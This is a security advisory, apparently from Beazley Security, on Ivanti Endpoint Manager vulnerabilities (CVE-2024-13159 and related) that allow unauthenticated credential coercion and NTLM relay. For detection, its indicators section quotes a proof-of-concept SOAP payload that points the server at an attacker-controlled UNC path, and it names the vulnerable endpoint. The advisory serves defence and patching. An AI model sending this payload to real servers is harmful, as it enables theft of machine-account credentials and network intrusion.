Executive Summary

A path traversal flaw in Ivanti Endpoint Manager on versions 2024 November Security Update or before and 2022 SU6 November Security Update or before allows for leakage of sensitive information by a remote, unauthenticated attacker. On January 13^th, software vendor Ivanti published a security advisory detailing a critical vulnerability (CVE-2024-13159) in their Ivanti Endpoint Manager (EPM) product. On March 10^th, CISA added this and two related Ivanti EPM vulnerabilities (CVE-2024-13160, CVE-2024-13161) to its Known Exploited Vulnerability (KEV) catalog, confirming active exploitation of these vulnerabilities by threat actor groups. The most severe vulnerability, CVE-2024-13159, could allow an unauthenticated attacker to bypass authentication and gain unauthorized access to confidential system information. Ivanti is strongly recommending affected organizations apply available security updates as soon as possible to mitigate this risk.

Affected Ivanti EPM servers are sometimes exposed to the internet by design for remote management of endpoints. As a result, successful exploitation of this vulnerability provides threat actors a way to access sensitive server data, potentially including information to gain access into affected organizations’ networks to facilitate attack activity and lateral movement.

Ivanti has released patches for Ivanti EPM along with their advisory, and details can be found below.

Beazley Security strongly recommends organizations immediately apply patches for affected Ivanti products and review affected systems for signs of compromise.

Affected Systems or Products

These vulnerabilities affect Ivanti EPM. For details refer to the table below.

Security hot patches have been made available from Ivanti for EPM core servers and remote consoles. Please see the Patches section of this advisory for more information.

Mitigations / Workarounds

The best mitigation to this threat is to apply the available security patches provided by Ivanti for their EPM product. If possible, limit network access to the Ivanti EPM server by restricting access to trusted networks so that only expected, trusted systems can access the server.

Patches

Patches for affected Ivanti EPM services have been made available from Ivanti. To download patches, Ivanti customers can log into the Ivanti Licensing System (ILS). Ivanti has provided this guide on how to download software. Specific patch installation steps for each version are provided in Ivanti’s original advisory, with additional instructions on how to troubleshoot patch errors if any arise for EPM 2024 flat and EPM 2022 SU6.

Indicators of Compromise

At the time of this advisory, Ivanti has not provided any indicators of compromise. It is recommended that any exposed, vulnerable systems be monitored and checked for any signs of unauthorized access or compromise.

From the proof-of-concept code, unexpected web posts containing the payload:

 
<GetHashForWildcardRecursive xmlns="http://tempuri.org/">
<wildcard>\\\\{}\\tmp\\file1.txt</wildcard>
</GetHashForWildcardRecursive> 

to the EPM server endpoint located at ‘<server>\WSVulnerabilityCore/VulCore.asmx’ may indicate attempts to exploit this vulnerability.

Another indicator of attack may be unexpected NTLM authentication attempts from the Ivanti EPM server to other infrastructure, especially if authentication attempts are observed to untrusted internet facing systems.

Impacted customers should contact Ivanti support via their Success Portal to report incidents and obtain additional incident response support.

Technical Details

A path traversal vulnerability was disclosed within the Ivanti EPM which, if exploited, could allow an attacker to retrieve sensitive information from the EPM server. Specifically, vulnerabilities were discovered within the WSVulnerabilityCore.dll component bundled in Ivanti’s EPM software. This vulnerability could potentially lead to unauthorized access and privilege escalation within a network environment.

Per horizon3.ai’s write up on the Ivanti EPM vulnerabilities, specific methods within the affected dynamic-link library (DLL) can be called and manipulated to cause the EPM server to attempt reading all files in a given directory. The GetHashForWildCardRecursive method within the DLL is used to process file paths for computing hashes, but it does not properly validate inputs.

Due to this, an attacker can craft malicious inputs to an unauthenticated, remotely accessible endpoint on the EPM service (/WSVulnerabilityCore/VulCore.asmx). These inputs could invoke the server to attempt accessing remote paths over the network, which could theoretically lead to a relay attack.

By forcing the server to attempt authentication with an attacker-controlled system via this remote path, a relay attack running on the attacker system would have potential to steal the EPM machine account credentials when it tries to authenticate. If successful, the attacker system could capture authentication details such as account and NTLM hash from the victim’s server.

How Beazley Security is responding

Beazley Security is monitoring client perimeter devices through our Karma product to identify impacted devices and support organizations to remediate any issues found.

We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

Sources

• 

  https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US

• 

  https://github.com/horizon3ai/Ivanti-EPM-Coercion-Vulnerabilities/tree/main

• 

  https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/

• 

  https://success.ivanti.com/Community_RegStep1_Page?inst=UL